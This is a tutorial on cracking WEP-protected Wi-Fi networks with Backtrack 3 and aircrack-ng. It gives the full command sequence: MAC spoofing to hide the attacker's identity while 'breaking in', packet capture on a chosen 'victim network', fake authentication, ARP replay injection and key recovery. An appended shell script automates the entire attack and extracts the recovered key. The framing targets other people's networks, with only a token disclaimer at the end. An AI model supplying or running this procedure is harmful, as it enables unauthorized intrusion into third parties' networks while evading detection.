How To Hack WEP wifi Passwords
1. Getting the right tools

Download Backtrack 3. It can be found here:

The Backtrack 4 beta is out, but until it is fully tested (especially if you are a noob) I would get the BT3 setup. The rest of this guide assumes you downloaded BT3.

I downloaded the CD iso and burned it to a CD. Insert your BT3 CD/USB drive and reboot your computer into BT3. I always load the 3rd boot option from the boot menu (VESA/KDE). You only have a few seconds before it auto-boots into the 1st option, so be ready. The 1st option boots too slowly or not at all, so always boot from the 2nd or 3rd. Experiment to see what works best for you.
2. Preparing the victim network for attack

Once in BT3, click the tiny black box in the lower left corner to open a "Konsole" window. Now we must prep your wireless card. Type:

airmon-ng

You will see the name of your wireless interface (mine is named "ath0"). From here on out, replace "ath0" with the name of your interface. Now type:

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then:

macchanger --mac 00:11:22:33:44:55 wifi0

then:

airmon-ng start wifi0

On the madwifi driver that BT3 ships (which is where the ath0/wifi0 names come from), wifi0 is the physical radio and ath0 is the virtual interface that airmon-ng creates on top of it in monitor mode. That is why the MAC address is changed on wifi0 while every capture and injection command below uses ath0. What these steps did was spoof (fake) your MAC address so that, JUST IN CASE your computer is discovered by someone while you are breaking in, they will not see your REAL MAC address. The same spoofed address is handed to aireplay-ng later with -h, so keep it consistent. Moving on...
Now it's time to discover some networks to break into. Type:

airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better signal (the PWR column) than others, and it is a good idea to pick one that has a decent signal; otherwise it will take forever to crack, or you may not be able to crack it at all. Once you see the network that you want to crack, hold down Ctrl and tap C. This will stop airodump from populating networks and freeze the screen so that you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace whatever is in parentheses with the value I tell you to take from your screen. For example, if I say to type:

-c (channel)

then don't actually type in

-c (channel)

Instead, replace that with whatever the channel number is. So, for example, you would type:

-c 6

Can't be much clearer than that. Let's continue...
Now find the network that you want to crack and MAKE SURE that the encryption column (ENC) for that network says WEP. If it says WPA or any variation of WPA, then move on... you can still crack WPA with Backtrack and some other tools, but it is a whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and BSSID. The BSSID is the access point's MAC address, six hex bytes separated by colons, so it will look something like this --> 00:1A:2B:3C:4D:5E. The channel number will be under a heading that says "CH". Now, in the same Konsole window, type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The FILE NAME can be whatever you want. It is simply the prefix for the files where airodump-ng stores the packets you receive, to crack later. You don't put in an extension... just pick a random word that you will remember. I usually make mine "wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, use a different file name for each one. airodump-ng never overwrites an existing capture: reusing the prefix "wepkey" makes it write wepkey-02.cap, so the wepkey-01.cap you point aircrack-ng at in step 3 would still be the OLD capture. I usually just name them wepkey1, wepkey2, etc.
Once you have typed in that last command, the airodump screen will change and start to show your computer gathering packets. You will also see a heading marked "IV" (labelled "#Data" in later airodump-ng versions) with a number underneath it. This stands for "Initialization Vector". WEP builds the RC4 key for every packet by sticking a 24-bit IV in front of the shared key, and that IV is sent in the clear. Because the IV space is so small and the first bytes of RC4's output leak information about the key (and the first encrypted byte of every data frame is a known LLC/SNAP header), collecting enough packets with distinct IVs lets aircrack-ng recover the key statistically. In noob terms, IVs are "packets of info that contain clues to the password." Once you gain a minimum of 5,000 of these IVs, you can try to crack the password.

I've cracked some right at 5,000 and others have taken over 60,000. How many you need depends mostly on the key length, not on how "difficult" the characters are: a 64-bit WEP key has only 40 secret bits and falls quickly, a 128-bit key has 104 secret bits and usually needs tens of thousands of IVs. The attack is statistical, so a random key and a dictionary word of the same length take the same amount of traffic.

Now you are thinking, "I'm screwed because my IVs are going up really slowly." Well, don't worry, now we are going to trick the router into giving us HUNDREDS of IVs per second.
3. Actually cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this one type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This is a fake authentication: it associates your spoofed MAC address with the access point so the router will accept frames injected from it. You should see "Association successful :-)". On its own this generates no traffic, so in the same window start the ARP request replay attack:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is reading packets and waiting on ARP and ACK. Don't worry about what these mean... just know that these are your meal tickets. Now you just sit and wait. Once your computer finally captures an ARP request, it will replay it at the router over and over, and because the router answers every copy with a freshly encrypted packet (a new IV each time), you will see hundreds of ARPs and ACKs per second. Sometimes this starts to happen within seconds... sometimes you have to wait up to a few minutes for a real client to send an ARP request. Just be patient.

When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV heading starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 you can start your password crack. It will probably take more than this, but I always start my password cracking at 5,000 just in case it is a short (40-bit) key.

Now you need to open up a 3rd and final Konsole window. This is where we actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap.

Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack, and 104-bit keys can need 40,000 or more. If this is the case, aircrack will test what you've got so far and then say something like "not enough IVs. Retry at 10,000." DON'T DO ANYTHING! It will stay running... it is just letting you know that it is paused until more IVs are gathered; it re-reads the capture file as airodump-ng keeps writing to it. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IVs. Retry at 15,000." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the password! Now, if the password looks goofy, don't worry, it will still work. aircrack-ng always displays the recovered key as hex bytes with a colon after every 2 characters, and if every byte is a printable character it also shows the ASCII form, which is exactly what the owner typed. So if the password was "abcde", it would be displayed as something like:

KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde )

Some keys were entered as hex in the first place (a WEP key is 10 hex digits for 64-bit or 26 hex digits for 128-bit, i.e. 5 or 13 ASCII characters), in which case there is no readable ASCII form and aircrack shows only the hex, for example:

0F:2A:94:27:B3

It doesn't matter either way, because you can type in either one and it will connect you to the network: enter the ASCII form as-is, or the hex form with the colons omitted (6162636465 or 0F2A9427B3 for the two examples above). Boot back into whatever operating system you use, try to connect to the network, type in the key, and presto! You are in!
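The three Konsole windows above, as one script. This is an added example, not code from the original post: it assumes BT3 with the madwifi driver (wifi0 as the radio, ath0 as the monitor interface), the tutorial's spoofed MAC and "wepkey" prefix, root, and the aircrack-ng suite on PATH. The helpers at the bottom (wep_key_from_line, is_valid_wep_hex, wep_hex_to_ascii) are pure text processing and run anywhere; the sample "KEY FOUND!" line they are meant for is the one shown above, constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original post: the tutorial's procedure as one
# script, plus helpers that turn aircrack-ng's "KEY FOUND!" line into a key
# you can type. Assumptions: BT3 with the madwifi driver (wifi0 = radio,
# ath0 = monitor interface), the tutorial's spoofed MAC and "wepkey" prefix,
# root privileges, and the aircrack-ng suite on PATH. The key helpers at the
# bottom need none of that and run anywhere.

SPOOF_MAC="00:11:22:33:44:55"
PREFIX="wepkey"
IFACE="ath0"
RADIO="wifi0"

# Step 2: monitor mode under a spoofed MAC (the MAC lives on the radio device).
prep_card() {
    airmon-ng stop "$IFACE"
    ifconfig "$RADIO" down
    macchanger --mac "$SPOOF_MAC" "$RADIO"
    airmon-ng start "$RADIO"
}

# Step 2, second half: lock onto one AP/channel and write $PREFIX-01.cap.
capture() {          # capture <bssid> <channel>
    airodump-ng -c "$2" -w "$PREFIX" --bssid "$1" "$IFACE"
}

# Step 3: fake-authenticate (-1) so the AP accepts our frames, then replay
# captured ARP requests (-3); the AP re-encrypts each reply with a fresh IV.
inject() {           # inject <bssid>
    aireplay-ng -1 0 -a "$1" -h "$SPOOF_MAC" "$IFACE" &&
    aireplay-ng -3 -b "$1" -h "$SPOOF_MAC" "$IFACE"
}

# Step 3, last window: aircrack-ng re-reads the growing capture on its own.
crack() {            # crack <bssid>
    aircrack-ng -b "$1" "$PREFIX-01.cap"
}

# ---- key helpers (pure text processing, no hardware needed) ----

# Pull the colon-separated hex key out of a "KEY FOUND! [ .. ]" line and
# drop the colons. Fails (prints nothing) if the line carries no key.
wep_key_from_line() {
    printf '%s\n' "$1" |
        sed -n 's/.*KEY FOUND! \[ *\([0-9A-Fa-f:]*\) *].*/\1/p' |
        tr -d ':' | grep .
}

# Real WEP keys are 40 or 104 bits: exactly 10 or 26 hex digits.
is_valid_wep_hex() {
    case "$1" in *[!0-9A-Fa-f]*) return 1 ;; esac
    [ "${#1}" -eq 10 ] || [ "${#1}" -eq 26 ]
}

# Show the key as the ASCII the owner typed when every byte is printable;
# fail otherwise, meaning "enter the hex form instead".
wep_hex_to_ascii() {
    hex="$1"; out=""
    while [ -n "$hex" ]; do
        byte=$(printf '%.2s' "$hex")       # next two hex digits
        hex=${hex#??}
        dec=$((0x$byte))
        [ "$dec" -ge 32 ] && [ "$dec" -le 126 ] || return 1
        out="$out$(printf "\\$(printf '%03o' "$dec")")"
    done
    printf '%s\n' "$out"
}

# Usage: ./wep.sh <bssid> <channel>
# Windows 1 and 2 run in the background and log to files; window 3 (aircrack)
# stays in the foreground so you can watch it retry as IVs come in.
if [ "$#" -eq 2 ]; then
    prep_card
    capture "$1" "$2" > capture.log 2>&1 & cap_pid=$!
    sleep 5                                 # let airodump-ng create the .cap
    inject "$1" > inject.log 2>&1 & inj_pid=$!
    crack "$1" | tee crack.log
    kill "$cap_pid" "$inj_pid" 2>/dev/null
    key=$(wep_key_from_line "$(grep 'KEY FOUND' crack.log)") && {
        printf 'hex key (type without colons): %s\n' "$key"
        wep_hex_to_ascii "$key" | sed 's/^/ascii key: /'
    }
fi
```

The hex helper is the part worth keeping even if you never run the attack end to end: a key whose byte count is not 5 or 13 is not a WEP key at all, and a key with a non-printable byte has no ASCII form, so the "ASCII" field aircrack prints (or omits) is not a second password but the same bytes shown two ways.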
It may seem like a lot to deal with if you have never done it, but after a few successful attempts you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do falls completely on you because... technically... this is just for you to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability. HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this... read the tut and go experiment until you get it right.
There are rare occasions where someone will use WEP encryption with SKA (Shared Key Authentication) as well. If this is the case, additional steps are needed to associate with the router, so the fake authentication step I lined out here will not work: with SKA the router sends a challenge that has to be encrypted with the WEP key before it will let you associate, so aireplay-ng needs a keystream (PRGA) file captured from a legitimate client's authentication (airodump-ng saves one with a .xor extension when it sees such an exchange) and is given it with the -y option. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.